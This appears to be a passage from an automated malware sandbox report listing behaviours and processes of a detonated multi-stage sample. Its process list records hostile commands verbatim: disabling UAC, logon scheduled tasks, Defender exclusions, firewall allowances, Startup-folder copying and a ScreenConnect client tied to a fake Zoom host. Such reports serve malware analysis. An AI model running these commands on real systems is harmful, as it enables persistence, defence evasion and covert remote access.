| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\TransferRare | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| File opened for modification | C:\Windows\EscortsNascar | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| File opened for modification | C:\Windows\NavyPromising | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| File opened for modification | C:\Windows\HonoluluSyndrome | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| File opened for modification | C:\Windows\OxfordPrintable | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| File opened for modification | C:\Windows\ViBases | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| File opened for modification | C:\Windows\ImmediatelyBros | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\36.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Update.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\T.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\windows.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\test.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\a\test.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\a\test.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\Update.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\test.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"
C:\ProgramData\Synaptics\Synaptics.exe
"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
C:\Users\Admin\AppData\Local\Temp\a\1.exe
"C:\Users\Admin\AppData\Local\Temp\a\1.exe"
C:\Users\Admin\AppData\Local\Temp\a\test.exe
"C:\Users\Admin\AppData\Local\Temp\a\test.exe"
C:\Users\Admin\AppData\Local\Temp\a\Update.exe
"C:\Users\Admin\AppData\Local\Temp\a\Update.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Universities Universities.cmd & Universities.cmd
C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
"C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe"
C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe
"C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\0cef7d10d8f459fc\ScreenConnect.ClientSetup.msi"
C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe
"C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\a\windows.exe
"C:\Users\Admin\AppData\Local\Temp\a\windows.exe"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe
"C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe"
C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe
"C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe" -burn.filehandle.attached=688 -burn.filehandle.self=540
C:\Users\Admin\AppData\Local\Temp\a\T.exe
"C:\Users\Admin\AppData\Local\Temp\a\T.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 1347DC49D48561C4A02CAEABAB78B4B1 C
C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe
C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe
C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe
"C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIC10E.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240632515 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe
C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Bitdefender\$77-Bitdefender.exe"
C:\Users\Admin\AppData\Local\Temp\a\access.exe
"C:\Users\Admin\AppData\Local\Temp\a\access.exe"
C:\ProgramData\Bitdefender\$77-Bitdefender.exe
C:\ProgramData\Bitdefender\$77-Bitdefender.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "opssvc wrsa"
C:\Users\Admin\AppData\Local\Temp\a\36.exe
"C:\Users\Admin\AppData\Local\Temp\a\36.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4552 -ip 4552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 364
C:\Users\Admin\AppData\Local\Temp\a\99999.exe
"C:\Users\Admin\AppData\Local\Temp\a\99999.exe"
C:\Users\Admin\AppData\Local\Temp\a\22.exe
"C:\Users\Admin\AppData\Local\Temp\a\22.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD1C7.tmp.bat""
C:\Users\Admin\AppData\Roaming\server.exe
"C:\Users\Admin\AppData\Roaming\server.exe"
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe
"C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe"
C:\Users\Admin\AppData\Local\Temp\a\Network.exe
"C:\Users\Admin\AppData\Local\Temp\a\Network.exe"
C:\Users\Admin\AppData\Roaming\system.exe
"C:\Users\Admin\AppData\Roaming\system.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\a\rea.exe
"C:\Users\Admin\AppData\Local\Temp\a\rea.exe"
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe
"C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\T.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe' -Force
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "SCSI Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmpEF71.tmp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe' -Force
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "SCSI Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpF50F.tmp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e6TONnwlRjZT.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Network.exe'
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Network.exe'
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 812A33CB12312E6462786B39941DA2A5
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 8849EAC97ADA90BEB9C92DE240009D0C E Global\MSI0000
C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mail.mindfulinvoice.online&p=8041&s=a205822a-25dd-4182-ae48-34f1f8dfcbcd&k=BgIAAACkAABSU0ExAAgAAAEAAQBBzfcAyYpoA9s86t45oTU7RBr4d3j4wo7ZWaxqW1gXVfaaoS%2bfd0k%2bPJKuwjzsEUcR0STNhshdEUFtsJUgTCaM2RxVswQODfRB%2fxy8spQ2LWWZZewzTdxJbjosBiXV2QpUCcfCmF5yx2%2fO4iVCF7r%2bUlzDG93NmkPtCrZC9yxqlnxALMX%2bF%2faXCCBkyDmMu3o22AbtP3XzZdSzxk8RbscXClS7evLV%2bxau13F1YFn%2baxZ7QaXuHbPv1tE2Bs26tkj%2fE18oOxpgof0OaK2Jy%2bP9WIy8ymeDPQIfocdTFuAek5wZ3lNpFAcbox7NXzIde9yf0dLrOLPA36Dg%2fHz05hjY&c=zoom&c=zoom-invite.com&c=&c=&c=&c=&c=&c="
C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe" "RunRole" "791a6c20-0820-417e-b3aa-8d215157e49c" "User"
C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe
"C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
